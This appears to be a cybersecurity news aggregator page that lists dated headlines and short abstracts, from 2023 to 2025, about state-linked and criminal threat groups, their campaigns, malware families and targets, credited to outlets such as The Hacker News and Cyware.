Hacker
May 27, 2025
Russia-Affiliated Threat Actor Void Blizzard Targets NATO and Ukraine with Credential Theft and Cloud Abuse
Abstract
A newly identified Russia-affiliated threat actor, Void Blizzard (also known as LAUNDRY BEAR), has been conducting widespread cyberespionage operations targeting critical sectors across NATO member states and Ukraine. (Microsoft)
May 23, 2025
Russian hacker group Killnet returns with new identity
Abstract
Once known for its pro-Kremlin hacktivist campaigns, the group now appears to function as a profit-driven cyber mercenary collective, offering hack-for-hire services and targeting a broader range of victims. (The Record)
April 28, 2025
AgeoStealer: How Social Engineering Targets Gamers
Abstract
Instead of relying on traditional malware distribution channels, the threat actors behind AgeoStealer leverage a popular communication platform among gamers to directly contact victims to test their video game. (Flashpoint)
April 16, 2025
Hacktivist Group Becomes More Sophisticated, Targets Critical Infrastructure to Deploy Ransomware
Abstract
A recent report shed light on the evolving tactics of hacktivist groups, moving beyond traditional cyber disruptions like DDoS attacks and website defacements to engage in more advanced critical infrastructure attacks and ransomware operations. (GBHackers)
March 22, 2025
Dragon RaaS: Pro-Russian Hacktivist Group Walks the Razor’s Edge Between Cybercrime and Propaganda
Abstract
Known as Dragon RaaS, or simply Dragon Team, this emerging group blends political hacktivism with opportunistic cybercrime — all while operating under the shadowy umbrella of “The Five Families” cybercrime syndicate. (Security Online)
March 21, 2025
Chinese Threat Actor UAT-5918 Targets Critical Infrastructure Entities in Taiwan
Abstract
Typical tooling used by UAT-5918 includes networking tools such as FRPC, FScan, In-Swor, Earthworm, and Neo-reGeorg. Credential harvesting is accomplished by dumping registry hives and NTDS and by using tools such as Mimikatz and browser data stealers. (Talos)
March 19, 2025
Indonesian Hacking Collective INDOHAXSEC Uncovered
Abstract
Throughout the last couple of months, the hacktivist group has conducted cyberattacks such as DDoS and has carried out ransomware attacks against numerous entities and governmental bodies in Southeast Asia. (Arctic Wolf)
March 1, 2025
Lotus Blossom Espionage Group Targets Multiple Industries With Different Versions of Sagerunex and Hacking Tools
Abstract
Cisco Talos uncovered two new variants of the Sagerunex backdoor, which were detected during attacks on telecommunications and media companies, as well as many Sagerunex variants persistent in the government and manufacturing industries. (Talos Intelligence)
February 18, 2025
EarthKapre Leverages Cloud Infrastructure and DLL Sideloading for Data Exfiltration
Abstract
This latest attack chain showcases the group’s ability to weaponize legitimate tools, leveraging DLL sideloading techniques and cloud-based infrastructure to stealthily infiltrate networks and exfiltrate sensitive data. (eSentire)
December 28, 2024
Cyber Espionage Cluster Paper Werewolf Engages in Destructive Behavior
Abstract
The BI.ZONE Threat Intelligence team has recorded a surge in the activity of the Paper Werewolf cluster (aka GOFFEE), which has conducted at least seven campaigns since 2022. Victims include government, energy, financial, media, and other sectors. (Cyware)
December 24, 2024
“Holy League” Hacktivist Group Emerges, Targets West
Abstract
Holy League employs a blend of DDoS attacks, website defacements, and data breaches to incite fear and attract attention. Their propaganda combines dystopian visuals and religious themes. (Security Online)
December 21, 2024
Unpacking the Diicot Malware Targeting Linux Environments
Abstract
The Diicot threat group (also known as Mexals) is known for targeting Linux systems using techniques like self-propagating tools, custom UPX packers, Internet scanning, and cryptomining malware like XMRig. (Wiz)
December 21, 2024
UAC-0125 Abuses Cloudflare Workers to Distribute Malware Disguised as Army+ App
Abstract
As part of the operation, the hackers create fraudulent websites that mimic the official page of a Ukrainian military app, Army+, tricking users into downloading an executable file disguised as an app installation package. (The Hacker News)
December 3, 2024
North Korean Kimsuky Hackers Use Russian Email Addresses for Credential Theft Attacks
Abstract
"Phishing emails were sent mainly through email services in Japan and Korea until early September," Korean cybersecurity firm Genians said. "Then, from mid-September, some phishing emails disguised as if they were sent from Russia were observed." (The Hacker News)
November 20, 2024
Unveiling LIMINAL PANDA - Threats to Telecom Sector
Abstract
LIMINAL PANDA has used compromised telecom servers to initiate intrusions into further providers in other geographic regions. The adversary conducts elements of their intrusion activity using protocols that support mobile telecommunications. (CrowdStrike)
November 13, 2024
North Korean Hackers Create Flutter Apps to Bypass macOS Security
Abstract
North Korean hackers have created Flutter apps to bypass macOS security measures. They created trojanized Notepad apps and minesweeper games using Flutter, which were signed and notarized by legitimate Apple developer IDs. (Bleeping Computer)
November 12, 2024
Breaking Down Earth Estries’ Persistent TTPs in Prolonged Cyber Operations
Abstract
Trend Micro identified two infection chains: the first uses PsExec and WMI for lateral movement, while the second exploits vulnerabilities in Microsoft Exchange servers with the ChinaChopper web shell. (Trend Micro)
November 6, 2024
An Introduction to Operational Relay Box (ORB) Networks - Unpatched, Forgotten, and Obscured
Abstract
The S2 Research Team at Team Cymru has identified Operational Relay Box (ORB) networks as a rising threat in cybersecurity. These networks combine aspects of VPNs and botnets to enhance anonymity and resilience for threat actors. (Team Cymru)
October 10, 2024
CyberVolk: From Hacktivism to Ransomware – Researcher Exposes New Threat
Abstract
Initially tied to pro-Russian hacktivist movements, CyberVolk has targeted Spain in response to geopolitical events. They have transitioned from DDoS attacks to ransomware, leading coordinated campaigns against Spanish institutions. (Security Online)
October 7, 2024
FIN7 Hackers Launch Deepfake Nude Generator Sites to Spread Malware
Abstract
The FIN7 gang is hiding malware in AI "Deepnude" sites to lure victims with promises of deepfake tool downloads. Security experts have identified the malicious sites hosted by the Russia-based FIN7 on various aiNude[.]ai domains. (Bleeping Computer)
October 4, 2024
Andariel Hacking Group Shifts Focus to Financial Attacks on U.S. Organizations
Abstract
Andariel, a North Korean state-sponsored threat actor, has shifted its focus to conducting financial attacks on U.S. organizations. While three organizations in the U.S. were recently targeted in August 2024, no ransomware was successfully deployed. (The Hacker News)
September 28, 2024
Cloudflare Warns of India-Linked Hackers Targeting South and East Asian Entities
Abstract
SloppyLemming has been active since at least July 2021 and has targeted the government, law enforcement, energy, education, telecommunications, and technology sectors in countries such as Pakistan, Sri Lanka, Bangladesh, China, Nepal, and Indonesia. (The Hacker News)
August 29, 2024
Threat Group ‘Bling Libra’ Pivots to Extortion for Cloud Attacks
Abstract
The threat group known as Bling Libra, previously linked to the Ticketmaster data breach, has shifted to the double extortion strategy in cloud attacks, according to researchers at Palo Alto Networks' Unit 42. (Dark Reading)
August 29, 2024
Researchers Unmasked the Notorious Threat Actor USDoD
Abstract
CrowdStrike researchers have uncovered the identity of the hacker USDoD, also known as EquationCorp, responsible for multiple high-profile data breaches. According to a report from TecMundo, USDoD is a man named Luan BG from Brazil. (Security Affairs)
July 25, 2024
‘Stargazer Goblin’ Amasses Thousands of Rogue GitHub Accounts to Spread Malware
Abstract
Stargazer Goblin has been distributing various malware families like Atlantida Stealer, Lumma, and Rhadamanthys since at least August 2022. The threat actor charges users to "star" repositories with fake accounts, increasing their credibility. (Dark Reading)
July 10, 2024 – Phishing
Regional Transport Office Themed Phishing Campaign Targets Android Users In India
Abstract
Phishing messages impersonating the Regional Transport Office have been circulating since 2024, claiming traffic violations and prompting users to download a malicious APK named "VAHAN PARIVAHAN.apk". (Cyble)
As CISOs Grapple with the C-Suite, Job Satisfaction Takes a Hit
Abstract
Research shows that 75% of CISOs are considering a job change due to various challenges and pressures. CISOs often face accountability for cyber incidents and compliance failures, leading to discontent. (Cybersecurity Dive)
May 25, 2024
Sharp Dragon Expands Towards Africa and The Caribbean
Abstract
The threat actors demonstrate increased caution in selecting their targets, broadening their reconnaissance efforts, and adopting Cobalt Strike Beacon over custom backdoors. (Check Point)
May 8, 2024
Scattered Spider Group a Unique Challenge for Cyber Cops, FBI Leader Says
Abstract
Identified by analysts in 2022, the hackers use social engineering to lure users into giving up their login credentials or one-time password codes to bypass multifactor authentication. (The Record)
April 25, 2024
Chinese, Russian Espionage Campaigns Increasingly Targeting Edge Devices
Abstract
Chinese and Russian hackers have turned their focus to edge devices — like VPN appliances, firewalls, routers and Internet of Things (IoT) tools — amid a startling increase in espionage attacks, according to Google security firm Mandiant. (The Record)
April 23, 2024
Microsoft Warns of North Korean Hackers Turning to AI-Fueled Cyber Espionage
Abstract
Microsoft specifically highlighted a group named Emerald Sleet (aka Kimsuky or TA427), which has been observed using LLMs to bolster spear-phishing efforts aimed at Korean Peninsula experts. (The Hacker News)
April 15, 2024
Muddled Libra Shifts Focus to SaaS and Cloud for Extortion and Data Theft Attacks
Abstract
The threat actor known as Muddled Libra has been observed actively targeting software-as-a-service (SaaS) applications and cloud service provider (CSP) environments in a bid to exfiltrate sensitive data. (The Hacker News)
April 13, 2024
North Korean Hackers Exploit Two MITRE Sub-Techniques: Phantom DLL Hijacking, TCC Abuse
Abstract
The first, not entirely new, sub-technique involves manipulation of Transparency, Consent, and Control (TCC), a security protocol that regulates application permissions on Apple's macOS. (Cyware)
April 12, 2024
DarkBeatC2: The Latest MuddyWater Attack Framework
Abstract
The Iranian threat actor known as MuddyWater has been attributed to a new command-and-control (C2) infrastructure called DarkBeatC2, becoming the latest such tool in its arsenal after SimpleHarm, MuddyC3, PhonyC2, and MuddyC2Go. (Cyware)
April 6, 2024
Vietnamese Threat Actor Targeting Financial Data Across Asia
Abstract
Vietnamese financially motivated hackers are targeting businesses across Asia in a campaign to harvest corporate credentials and financial data for resale in online criminal markets. (Gov Infosecurity)
March 21, 2024
Curious Serpens’ FalseFont Backdoor: Technical Analysis, Detection and Prevention
Abstract
Curious Serpens has been active since at least 2013. This threat actor is associated with espionage and has targeted organizations in the Middle East, the United States, and Europe. (Palo Alto Networks)
March 12, 2024
Muddled Libra Threat Group Abuses Pentesting Tools to Infiltrate Networks
Abstract
Muddled Libra threat actors leverage pentesting tools to identify vulnerabilities in target systems and networks, enabling them to exploit security gaps and gain unauthorized access. (Cyware)
February 05, 2024
Patchwork Using Romance Scam Lures to Infect Android Devices with VajraSpy Malware
Abstract
The threat actor known as Patchwork likely used romance scam lures to trap victims in Pakistan and India, and infect their Android devices with a remote access trojan called VajraSpy. Slovak cybersecurity firm ESET said it uncovered 12 espionage apps, six of which were available for download from the official Google Play Store and were collectively downloaded more than 1,400 times between April 2021 and March 2023. "VajraSpy has a range of espionage functionalities that can be expanded based on the permissions granted to the app bundled with its code," security researcher Lukáš Štefanko said. "It steals contacts, files, call logs, and SMS messages, but some of its implementations can even extract WhatsApp and Signal messages, record phone calls, and take pictures with the camera." As many as 148 devices in Pakistan and India are estimated to have been compromised in the wild. The malicious apps distributed via Google Play and elsewhere primarily masqueraded (The Hacker News)
February 01, 2024
FritzFrog Returns with Log4Shell and PwnKit, Spreading Malware Inside Your Network
Abstract
The threat actor behind a peer-to-peer (P2P) botnet known as FritzFrog has made a return with a new variant that leverages the Log4Shell vulnerability to propagate internally within an already compromised network. "The vulnerability is exploited in a brute-force manner that attempts to target as many vulnerable Java applications as possible," web infrastructure and security company Akamai said in a report shared with The Hacker News. FritzFrog, first documented by Guardicore (now part of Akamai) in August 2020, is a Golang-based malware that primarily targets internet-facing servers with weak SSH credentials. It's known to be active since January 2020. It has since evolved to strike healthcare, education, and government sectors as well as improved its capabilities to ultimately deploy cryptocurrency miners on infected hosts. What's novel about the latest version is the use of the Log4Shell vulnerability as a secondary infection vector to specifically si (The Hacker News)
January 23, 2024
North Korean ScarCruft Attackers Gear Up to Target Cybersecurity Professionals
Abstract
The group is testing innovative infection routines that use technical threat research on another North Korean APT group, Kimsuky, as a lure, indicating a new approach to their cyberattacks. (Cyware)
January 20, 2024
Chinese Hackers Silently Weaponized VMware Zero-Day Flaw for 2 Years
Abstract
An advanced China-nexus cyber espionage group previously linked to the exploitation of security flaws in VMware and Fortinet appliances has been attributed to the abuse of a critical vulnerability in VMware vCenter Server as a zero-day since late 2021. "UNC3886 has a track record of utilizing zero-day vulnerabilities to complete their mission without being detected, and this latest example further demonstrates their capabilities," Google-owned Mandiant said in a Friday report. The vulnerability in question is CVE-2023-34048 (CVSS score: 9.8), an out-of-bounds write that could be put to use by a malicious actor with network access to vCenter Server to achieve remote code execution. It was fixed by the Broadcom-owned company on October 24, 2023. The virtualization services provider, earlier this week, updated its advisory to acknowledge that "exploitation of CVE-2023-34048 has occurred in the wild." UNC3886 first came to light in September 2022 when it was (The Hacker News)
January 13, 2024
Volt Typhoon Ramps Up Malicious Activity Against Critical Infrastructure
Abstract
Volt Typhoon is using compromised routers as a command-and-control network and deploying a new web shell called "fy.sh" on targeted Cisco routers, indicating a highly active and sophisticated operation. (Cyware)
January 09, 2024
Alert: Water Curupira Hackers Actively Distributing PikaBot Loader Malware
Abstract
A threat actor called Water Curupira has been observed actively distributing the PikaBot loader malware as part of spam campaigns in 2023. "PikaBot's operators ran phishing campaigns, targeting victims via its two components — a loader and a core module — which enabled unauthorized remote access and allowed the execution of arbitrary commands through an established connection with their command-and-control (C&C) server," Trend Micro said in a report published today. The activity began in the first quarter of 2023 and lasted until the end of June, before ramping up again in September. It also overlaps with prior campaigns that have used similar tactics to deliver QakBot, specifically those orchestrated by cybercrime groups known as TA571 and TA577. It's believed that the increase in the number of phishing campaigns related to PikaBot is the result of QakBot's takedown in August, with DarkGate emerging as another replacement. PikaBot is primarily a loader, which means (The Hacker News)
January 6, 2024
Syrian Threat Group Peddles Destructive SilverRAT
Abstract
A group known as Anonymous Arabic, with links to Turkey and Syria, is behind a sophisticated remote access Trojan called SilverRAT. They plan to release an updated version that can control compromised Windows systems and Android devices. (Cyware)
December 19, 2023
Hackers Abusing GitHub to Evade Detection and Control Compromised Hosts
Abstract
Threat actors are increasingly making use of GitHub for malicious purposes through novel methods, including abusing secret Gists and issuing malicious commands via git commit messages. "Malware authors occasionally place their samples in services like Dropbox, Google Drive, OneDrive, and Discord to host second stage malware and sidestep detection tools," ReversingLabs researcher Karlo Zanki said in a report shared with The Hacker News. "But lately, we have observed the increasing use of the GitHub open-source development platform for hosting malware." Legitimate public services are known to be used by threat actors for hosting malware and acting as dead drop resolvers to fetch the actual command-and-control (C2) address. While using public sources for C2 does not make them immune to takedowns, they do offer the benefit of allowing threat actors to easily create attack infrastructure that's both inexpensive and reliable. This technique is sneaky (The Hacker News)
December 16, 2023
Microsoft Warns of Storm-0539: The Rising Threat Behind Holiday Gift Card Frauds
Abstract
Microsoft is warning of an uptick in malicious activity from an emerging threat cluster it's tracking as Storm-0539 for orchestrating gift card fraud and theft via highly sophisticated email and SMS phishing attacks against retail entities during the holiday shopping season. The goal of the attacks is to propagate booby-trapped links that direct victims to adversary-in-the-middle (AiTM) phishing pages that are capable of harvesting their credentials and session tokens. "After gaining access to an initial session and token, Storm-0539 registers their own device for subsequent secondary authentication prompts, bypassing MFA protections and persisting in the environment using the fully compromised identity," the tech giant said in a series of posts on X (formerly Twitter). The foothold obtained in this manner further acts as a conduit for escalating privileges, moving laterally across the network, and accessing cloud resources in order to grab sensitive information, (The Hacker News)
December 07, 2023
Microsoft Warns of COLDRIVER’s Evolving Evading and Credential-Stealing Tactics
Abstract
The threat actor known as COLDRIVER has continued to engage in credential theft activities against entities that are of strategic interest to Russia while simultaneously improving its detection evasion capabilities. The Microsoft Threat Intelligence team is tracking the cluster as Star Blizzard (formerly SEABORGIUM). It's also called Blue Callisto, BlueCharlie (or TAG-53), Calisto (alternately spelled Callisto), and TA446. The adversary "continues to prolifically target individuals and organizations involved in international affairs, defense, and logistics support to Ukraine, as well as academia, information security companies, and other entities aligning with Russian state interests," Redmond said. Star Blizzard, linked to Russia's Federal Security Service (FSB), has a track record of setting up lookalike domains that impersonate the login pages of targeted companies. It's known to be active since at least 2017. In August 2023, Recorded Future (The Hacker News)
November 28, 2023
IMPERIAL KITTEN Deploys Novel Malware Families
Abstract
Between early 2022 and 2023, CrowdStrike Intelligence observed IMPERIAL KITTEN conduct SWC operations with a focus on targeting organizations in the transportation, logistics, and technology sectors. (Cyware)
November 10, 2023
Iran-Linked Imperial Kitten Cyber Group Targeting Middle East’s Tech Sectors
Abstract
A group with links to Iran targeted transportation, logistics, and technology sectors in the Middle East, including Israel, in October 2023 amid a surge in Iranian cyber activity since the onset of the Israel-Hamas war. The attacks have been attributed by CrowdStrike to a threat actor it tracks under the name Imperial Kitten, and which is also known as Crimson Sandstorm (previously Curium), TA456, Tortoiseshell, and Yellow Liderc. The latest findings from the company build on prior reports from Mandiant, ClearSky, and PwC, the latter of which also detailed instances of strategic web compromises (aka watering hole attacks) leading to the deployment of IMAPLoader on infected systems. "The adversary, active since at least 2017, likely fulfills Iranian strategic intelligence requirements associated with IRGC operations," CrowdStrike said in a technical report. "Its activity is characterized by its use of social engineering, particularly job recruitment-themed content, to deli (The Hacker News)
November 01, 2023
Researchers Expose Prolific Puma’s Underground Link Shortening Service
Abstract
A threat actor known as Prolific Puma has been maintaining a low profile and operating an underground link shortening service that's offered to other threat actors for at least the past four years. Prolific Puma creates "domain names with an RDGA [registered domain generation algorithm] and use these domains to provide a link shortening service to other malicious actors, helping them evade detection while they distribute phishing, scams, and malware," Infoblox said in a new analysis pieced together from Domain Name System (DNS) analytics. With malicious actors known to use link shorteners for phishing attacks, the adversary plays an important role in the cybercrime supply chain, registering between 35,000 and 75,000 unique domain names since April 2022. Prolific Puma is also considered a DNS threat actor, leveraging DNS infrastructure for nefarious purposes. A notable aspect of the threat actor's operations is the use of an American domain registrar and web (The Hacker News)
October 26, 2023
The Rise and Tactics of Octo Tempest: A Cyber Threat Analysis
Abstract
Octo Tempest, a financially motivated threat group known for extensive social engineering campaigns and SIM-swapping techniques, has become a major concern for businesses worldwide. It has been affiliated with ALPHV/BlackCat and began deploying ransomware payloads as well. Given Octo Tempest's rele ... (Cyware)
October 26, 2023
YoroTrooper: Researchers Warn of Kazakhstan’s Stealthy Cyber Espionage Group
Abstract
A relatively new threat actor known as YoroTrooper is likely made up of operators originating from Kazakhstan. The assessment, which comes from Cisco Talos, is based on their fluency in Kazakh and Russian, use of Tenge to pay for operating infrastructure, and very limited targeting of Kazakhstani entities, barring the government's Anti-Corruption Agency. "YoroTrooper attempts to obfuscate the origin of their operations, employing various tactics to make its malicious activity appear to emanate from Azerbaijan, such as using VPN exit nodes local to that region," security researchers Asheer Malhotra and Vitor Ventura said. First documented by the cybersecurity company in March 2023, the adversary is known to be active since at least June 2022, singling out various state-owned entities in the Commonwealth of Independent States (CIS) countries. Slovak cybersecurity firm ESET is tracking the activity under the name SturgeonPhisher. YoroTrooper's attack cycles (The Hacker News)
October 02, 2023
LUCR-3: Scattered Spider Getting SaaS-y in the Cloud
Abstract
LUCR-3 overlaps with groups such as Scattered Spider, Oktapus, UNC3944, and STORM-0875 and is a financially motivated attacker that leverages the Identity Provider (IDP) as initial access into an environment with the goal of stealing Intellectual Property (IP) for extortion. LUCR-3 targets Fortune 2000 companies across various sectors, including but not limited to Software, Retail, Hospitality, Manufacturing, and Telecoms. LUCR-3 does not rely heavily on malware or even scripts; instead, LUCR-3 expertly uses victims' own tools, applications, and resources to achieve their goals. At a high level, Initial Access is gained through compromising existing identities in the IDP (Okta: Identity Cloud, Azure AD / Entra, Ping Identity: PingOne). LUCR-3 uses SaaS applications such as document portals, ticketing systems, and chat applications to learn how the victim organization operates and how to access sensitive information. Using the data they gained from reconnaissance within the SaaS (The Hacker News)
September 18, 2023
Financially Motivated UNC3944 Threat Actor Shifts Focus to Ransomware Attacks
Abstract
The financially motivated threat actor known as UNC3944 is pivoting to ransomware deployment as part of an expansion to its monetization strategies, Mandiant has revealed. "UNC3944 has demonstrated a stronger focus on stealing large amounts of sensitive data for extortion purposes and they appear to understand Western business practices, possibly due to the geographical composition of the group," the threat intelligence firm said. "UNC3944 has also consistently relied on publicly available tools and legitimate software in combination with malware available for purchase on underground forums." The group, also known by the names 0ktapus, Scatter Swine, and Scattered Spider, has been active since early 2022, adopting phone-based social engineering and SMS-based phishing to obtain employees' valid credentials using bogus sign-in pages and infiltrate victim organizations, mirroring tactics adopted by another group called LAPSUS$. While the group originall (The Hacker News)
September 1, 2023 – Breach
Data Breach Could Affect More Than 100,000 in Pima County
Abstract
More than 100,000 Pima County residents could be affected by a nationwide data breach that affected the company that handled COVID-19 case investigations and contact tracing here, officials say. (Cyware)
August 25, 2023
China-Linked Flax Typhoon Cyber Espionage Targets Taiwan’s Key Sectors
Abstract
A nation-state activity group originating from China has been linked to cyber attacks on dozens of organizations in Taiwan as part of a suspected espionage campaign. The Microsoft Threat Intelligence team is tracking the activity under the name Flax Typhoon, which is also known as Ethereal Panda. "Flax Typhoon gains and maintains long-term access to Taiwanese organizations' networks with minimal use of malware, relying on tools built into the operating system, along with some normally benign software to quietly remain in these networks," the company said. It further said it hasn't observed the group weaponize the access to conduct data-collection and exfiltration. A majority of the targets include government agencies, educational institutions, critical manufacturing, and information technology organizations in Taiwan. A smaller number of victims have also been detected in Southeast Asia, North America, and Africa. The group is suspected to have been active si (The Hacker News)
August 25, 2023
New Luna Grabber Poses as Roblox Packages, Strikes NPM
Abstract
Malicious actors are targeting Roblox developers with a new malware called Luna Grabber, distributed through npm packages that impersonate legitimate software. These fake packages, including noblox.js-vps, noblox.js-ssh, and noblox.js-secure, house malicious multi-stage payloads. This campaign ... (Cyware)
August 24, 2023
Lazarus Group Exploits Critical Zoho ManageEngine Flaw to Deploy Stealthy QuiteRAT Malware
Abstract
The North Korea-linked threat actor known as Lazarus Group has been observed exploiting a now-patched critical security flaw impacting Zoho ManageEngine ServiceDesk Plus to distribute a remote access trojan called QuiteRAT. Targets include internet backbone infrastructure and healthcare entities in Europe and the U.S., cybersecurity company Cisco Talos said in a two-part analysis published today. What's more, a closer examination of the adversary's recycled attack infrastructure in its cyber assaults on enterprises has led to the discovery of a new threat dubbed CollectionRAT. The fact that the Lazarus Group continues to rely on the same tradecraft despite those components being well-documented over the years underscores the threat actor's confidence in their operations, Talos pointed out. QuiteRAT is said to be a successor to MagicRAT, itself a follow-up to TigerRAT, while CollectionRAT appears to share overlaps with EarlyRAT (aka Jupiter), an im (The Hacker News)
August 24, 2023
Telekopye: Hunting Mammoths using Telegram bot
Abstract
The exact origins of the threat actors, dubbed Neanderthals, are unclear, but evidence points to Russia as the country of origin of the toolkit's authors and users, owing to the use of Russian SMS templates. (Cyware)
August 23, 2023
Agile Approach to Mass Cloud Credential Harvesting and Crypto Mining Sprints Ahead
Abstract
Developers are not the only people who have adopted the agile methodology for their development processes. From 2023-06-15 to 2023-07-11, Permiso Security's p0 Labs team identified and tracked an attacker developing and deploying eight (8) incremental iterations of their credential harvesting malware while continuing to develop infrastructure for an upcoming (spoiler: now launched) campaign targeting various cloud services. While last week Aqua Security published a blog detailing this under-development campaign's stages related to infected Docker images, today Permiso p0 Labs and SentinelLabs are releasing joint research highlighting the incremental updates to the cloud credential harvesting malware samples systematically collected by monitoring the attacker's infrastructure. So get out of your seats and enjoy this scrum meeting stand-up dedicated to sharing knowledge about this actor's campaign and the tooling they will use to steal more cloud credentials. If you like IDA scree (The Hacker News)
August 23, 2023
Syrian Threat Actor EVLF Unmasked as Creator of CypherRAT and CraxsRAT Android Malware
Abstract
A Syrian threat actor named EVLF has been outed as the creator of malware families CypherRAT and CraxsRAT. "These RATs are designed to allow an attacker to remotely perform real-time actions and control the victim device's camera, location, and microphone," cybersecurity firm Cyfirma said in a report published last week. CypherRAT and CraxsRAT are said to be offered to other cybercriminals as part of a malware-as-a-service (MaaS) scheme. As many as 100 unique threat actors are estimated to have purchased the twin tools on a lifetime license over the past three years. EVLF is said to have been operating a web shop to advertise their warez since at least September 2022. CraxsRAT is billed as an Android trojan that enables a threat actor to remotely control an infected device from a Windows computer, with the developer consistently releasing new updates based on feedback from customers. The malicious package is generated using a builder, which comes with options to cus (The Hacker News)
August 22, 2023
EVLF DEV - Knowing the Creator of CypherRAT and CraxsRAT
Abstract
A fresh player in the realm of cyber threats has emerged under the moniker EVLF DEV, operating as a Malware-as-a-Service (MaaS) provider. Hailing from Syria and active for over eight years, this actor has developed the CypherRAT and CraxsRAT malware strains. To counteract such campaigns by maliciou ... (Cyware)
August 18, 2023
#OpFukushima: Anonymous group protests against the plan to dump Fukushima RADIOACTIVE wastewater into Pacific
Abstract
#OpFukushima: The famous collective Anonymous has launched cyberattacks against Japanese nuclear websites over the Fukushima water plan. The hacker collective Anonymous has launched cyberattacks against nuclear power-linked groups in Japan as part of an operation... (Security Affairs)
August 18, 2023
Chinese Hackers Accused of Targeting Southeast Asian Gambling Sector
Abstract
Hackers based in China are targeting the gambling sector across Southeast Asia in a campaign that researchers say is closely related to data collection and surveillance operations identified earlier this year. (Cyware)
August 17, 2023
China-Linked Bronze Starlight Group Targeting Gambling Sector with Cobalt Strike Beacons
Abstract
An ongoing cyber attack campaign originating from China is targeting the Southeast Asian gambling sector to deploy Cobalt Strike beacons on compromised systems. Cybersecurity firm SentinelOne said the tactics, techniques, and procedures point to the involvement of a threat actor tracked as Bronze Starlight (aka Emperor Dragonfly or Storm-0401), which has been linked to the use of short-lived ransomware families as a smokescreen to conceal its espionage motives. "The threat actors abuse Adobe Creative Cloud, Microsoft Edge, and McAfee VirusScan executables vulnerable to DLL hijacking to deploy Cobalt Strike beacons," security researchers Aleksandar Milenkoski and Tom Hegel said in an analysis published today. It also bears noting that the campaign exhibits overlaps with an intrusion set monitored by ESET under the name Operation ChattyGoblin. This activity, in turn, shares commonalities with a supply chain attack that came to light last year leveraging a troja (The Hacker News)
August 17, 2023
Hackers are Increasingly Hiding Within Services Such as Slack and Trello to Deploy Malware
Abstract
An analysis of more than 400 malware families deployed over the past two years found that at least a quarter of them abused legitimate internet services in some way as part of their infrastructure. (Cyware)
August 15, 2023
North Korean Hackers Suspected in New Wave of Malicious npm Packages
Abstract
The npm package registry has emerged as the target of yet another highly targeted attack campaign that aims to entice developers into downloading malevolent modules. Software supply chain security firm Phylum told The Hacker News the activity exhibits similar behaviors to that of a previous attack wave uncovered in June, which has since been linked to North Korean threat actors. As many as nine packages have been identified as uploaded to npm between August 9 and 12, 2023. This includes: ws-paso-jssdk, pingan-vue-floating, srm-front-util, cloud-room-video, progress-player, ynf-core-loader, ynf-core-renderer, ynf-dx-scripts, and ynf-dx-webpack-plugins. "Due to the sophisticated nature of the attack and the small number of affected packages, we suspect this is another highly targeted attack, likely with a social engineering aspect involved in order to get targets to install these packages," the company said. The attack chain commences with the package.json file with (The Hacker News)
August 14, 2023
Hacktivists Claim Attacks Against 21 Organizations Over Fukushima Wastewater Release
Abstract
Anonymous Italia, a group claiming to be affiliated with the hacktivist collective Anonymous, has launched cyber protests against the Japanese government over its decision to release wastewater from the Fukushima Daini Nuclear Power Plant. (Cyware)
August 8, 2023
New Threat Actor Targets Bulgaria, China, Vietnam, and Other Countries With Customized Yashma Ransomware
Abstract
The threat actor behind this operation uses an uncommon technique of downloading the ransom note from a GitHub repository, evading detection by carrying the download logic inside an embedded batch file. (Cyware)
August 08, 2023
Hackers Abusing Cloudflare Tunnels for Covert Communications
Abstract
New research has revealed that threat actors are abusing Cloudflare Tunnels to establish covert communication channels from compromised hosts and retain persistent access. "Cloudflared is functionally very similar to ngrok," Nic Finn, a senior threat intelligence analyst at GuidePoint Security, said. "However, Cloudflared differs from ngrok in that it provides a lot more usability for free, including the ability to host TCP connectivity over cloudflared." A command-line tool for Cloudflare Tunnel, cloudflared allows users to create secure connections between an origin web server and Cloudflare's nearest data center so as to hide the web server IP addresses as well as block volumetric distributed denial-of-service (DDoS) and brute-force login attacks. For a threat actor with elevated access on an infected host, this feature presents a lucrative approach to set up a foothold by generating a token required to establish the tunnel from the victim machine. (The Hacker News)
August 02, 2023
Russian Cyber Adversary BlueCharlie Alters Infrastructure in Response to Disclosures
Abstract
A Russia-nexus adversary has been linked to 94 new domains starting March 2023, suggesting that the group is actively modifying its infrastructure in response to public disclosures about its activities. Cybersecurity firm Recorded Future linked the revamped infrastructure to a threat actor it tracks under the name BlueCharlie, a hacking crew that's broadly known by the names Blue Callisto, Callisto (or Calisto), COLDRIVER, Star Blizzard (formerly SEABORGIUM), and TA446. BlueCharlie was previously given the temporary designation Threat Activity Group 53 (TAG-53). "These shifts demonstrate that these threat actors are aware of industry reporting and show a certain level of sophistication in their efforts to obfuscate or modify their activity, aiming to stymie security researchers," the company said in a technical report shared with The Hacker News. BlueCharlie is assessed to be affiliated with Russia's Federal Security Service (FSB), with the threat actor linked (The Hacker News)
July 17, 2023
CERT-UA Uncovers Gamaredon’s Rapid Data Exfiltration Tactics Following Initial Compromise
Abstract
The Russia-linked threat actor known as Gamaredon has been observed conducting data exfiltration activities within an hour of the initial compromise. "As a vector of primary compromise, for the most part, emails and messages in messengers (Telegram, WhatsApp, Signal) are used, in most cases, using previously compromised accounts," the Computer Emergency Response Team of Ukraine (CERT-UA) said in an analysis of the group published last week. Gamaredon, also called Aqua Blizzard, Armageddon, Shuckworm, or UAC-0010, is a state-sponsored actor with ties to the SBU Main Office in the Autonomous Republic of Crimea, which was annexed by Russia in 2014. The group is estimated to have infected thousands of government computers. It is also one of the many Russian hacking crews that have maintained an active presence since the start of the Russo-Ukrainian war in February 2022, leveraging phishing campaigns to deliver PowerShell backdoors such as GammaSteel to conduct recon (The Hacker News)
July 12, 2023
Chinese Hackers Deploy Microsoft-Signed Rootkit to Target Gaming Sector
Abstract
Cybersecurity researchers have unearthed a novel rootkit signed by Microsoft that's engineered to communicate with an actor-controlled attack infrastructure. Trend Micro has attributed the activity cluster to the same actor that was previously identified as behind the FiveSys rootkit, which came to light in October 2021. "This malicious actor originates from China and their main victims are the gaming sector in China," Trend Micro's Mahmoud Zohdy, Sherif Magdy, and Mohamed Fahmy said. Their malware seems to have passed through the Windows Hardware Quality Labs (WHQL) process for getting a valid signature. Multiple variants of the rootkit spanning eight different clusters have been discovered, with 75 such drivers signed using Microsoft's WHQL program in 2022 and 2023. Trend Micro's analysis of some of the samples has revealed the presence of debug messages in the source code, indicating that the operation is still in the development and testing phas (The Hacker News)
July 6, 2023
Crysis Threat Actors Use RDP Connections to Distribute Venus Ransomware
Abstract
